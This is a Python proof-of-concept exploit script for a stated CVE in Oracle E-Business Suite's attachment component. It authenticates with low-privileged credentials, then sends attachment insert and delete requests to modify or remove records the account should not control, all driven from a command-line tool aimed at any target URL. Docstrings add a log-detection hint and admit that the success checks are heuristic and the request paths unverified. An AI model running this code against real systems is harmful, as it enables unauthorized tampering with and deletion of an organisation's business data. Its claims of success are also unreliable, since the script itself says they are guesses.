#!/usr/bin/env python3
# CVE-2025-53071 - Oracle E-Business Suite Upload Attachments Unauthorized Data Modification PoC
# This PoC demonstrates the exploitation of improper access control in the
# Oracle Applications Framework Upload Attachments component.
import requests
import sys
import argparse
from urllib.parse import urljoin
class OracleEBSExploit:
    """HTTP client that replays this PoC's request sequence for CVE-2025-53071.

    It logs in with the supplied credentials, then sends one attachment
    insert request and one attachment delete request to the Oracle
    Applications Framework attachment page.

    NOTE(review): the paths and form fields below are what this script
    sends; they have not been checked here against Oracle's advisory.
    For detection, these same request shapes (the AttachmentPG page with an
    ``operation`` of INSERT or DELETE, issued by a session that should not
    hold attachment privileges) are what to look for in web-tier access logs.
    """

    def __init__(self, target_url, username, password):
        """Store the target and credentials and prepare a shared HTTP session.

        Args:
            target_url: Base URL of the EBS instance; trailing slashes are
                stripped.
            username: Account name posted to the login endpoint.
            password: Password posted to the login endpoint.
        """
        browser_headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
        }
        self.target_url = target_url.rstrip('/')
        self.username = username
        self.password = password
        # One Session object so cookies set at login are reused by later calls.
        self.session = requests.Session()
        self.session.headers.update(browser_headers)

    def authenticate(self):
        """Post the credentials to the login endpoint and report the outcome.

        Returns:
            True when the final response is HTTP 200 and its URL contains
            'AppsLocalLogin', otherwise False.

        This is a heuristic on the final URL only; it does not verify that
        an application session was actually established.
        """
        # urljoin with an absolute path discards any path in target_url.
        endpoint = urljoin(self.target_url, '/OA_HTML/AppsLogin')
        credentials = {
            'username': self.username,
            'password': self.password,
            'langCode': 'US',
        }
        reply = self.session.post(endpoint, data=credentials, allow_redirects=True)
        if reply.status_code != 200 or 'AppsLocalLogin' not in reply.url:
            print("[-] Authentication failed")
            return False
        print("[+] Authentication successful")
        return True

    def exploit_upload_attachment(self, attachment_data, target_entity_id):
        """Send the PoC's attachment insert request for the given entity.

        Args:
            attachment_data: File content sent as 'attachment.txt'.
            target_entity_id: Value placed in the 'entityId' form field.

        Returns:
            True only when the response is HTTP 200 and its lower-cased body
            does not contain 'error'; otherwise False.

        That result is a heuristic: it does not confirm that any record was
        written, so a True return is not evidence of impact by itself.
        """
        endpoint = urljoin(
            self.target_url,
            '/OA_HTML/OA.jsp?page=/oracle/apps/fnd/attachment/webui/AttachmentPG'
        )
        # Multipart body: the file part plus the form fields the PoC sets.
        file_part = {
            'uploadFile': ('attachment.txt', attachment_data, 'text/plain')
        }
        form_fields = {
            'entityId': target_entity_id,
            'entityName': 'FND_ATTACHED_DOCUMENTS',
            'category': 'MISC',
            'datatypeId': '1',
            'operation': 'INSERT',
            '_AM_TXnId': '0',
        }
        reply = self.session.post(endpoint, files=file_part, data=form_fields)
        if reply.status_code != 200:
            print("[-] Exploit attempt failed")
            return False
        print("[+] Attachment upload request sent successfully")
        if 'error' in reply.text.lower():
            print("[-] Exploit attempt failed")
            return False
        print("[+] Possible unauthorized data modification achieved")
        return True

    def exploit_unauthorized_delete(self, attachment_id):
        """Send the PoC's attachment delete request for one attachment id.

        Args:
            attachment_id: Value interpolated into the 'attachmentId' query
                parameter as given, without URL encoding.

        Returns:
            True when the response is HTTP 200, otherwise False. The body is
            not inspected, so True means only that the request was answered.
        """
        endpoint = urljoin(
            self.target_url,
            '/OA_HTML/OA.jsp?page=/oracle/apps/fnd/attachment/webui/AttachmentPG'
            f'&attachmentId={attachment_id}&operation=DELETE'
        )
        reply = self.session.get(endpoint)
        answered = reply.status_code == 200
        if answered:
            print(f"[+] Unauthorized delete request sent for attachment {attachment_id}")
        return answered
def main():
    """Parse the command line and run the PoC sequence once.

    The upload and delete requests are sent only if authenticate() returns
    True. Their return values are not checked here.
    """
    cli = argparse.ArgumentParser(description='CVE-2025-53071 PoC Exploit')
    cli.add_argument('-u', '--url', required=True, help='Target Oracle EBS URL')
    cli.add_argument('-l', '--username', required=True, help='Low-privileged username')
    # A password given on the command line is visible in the process list
    # and in shell history.
    cli.add_argument('-p', '--password', required=True, help='Password')
    cli.add_argument('-e', '--entity', default='1', help='Target entity ID')
    cli.add_argument('-a', '--attachment-id', default='1', help='Attachment ID to delete')
    opts = cli.parse_args()

    client = OracleEBSExploit(opts.url, opts.username, opts.password)
    if not client.authenticate():
        return
    client.exploit_upload_attachment(b'Malicious attachment data', opts.entity)
    client.exploit_unauthorized_delete(opts.attachment_id)
# Run the command-line entry point only when executed as a script, so that
# importing this module sends no requests.
if __name__ == '__main__':
    main()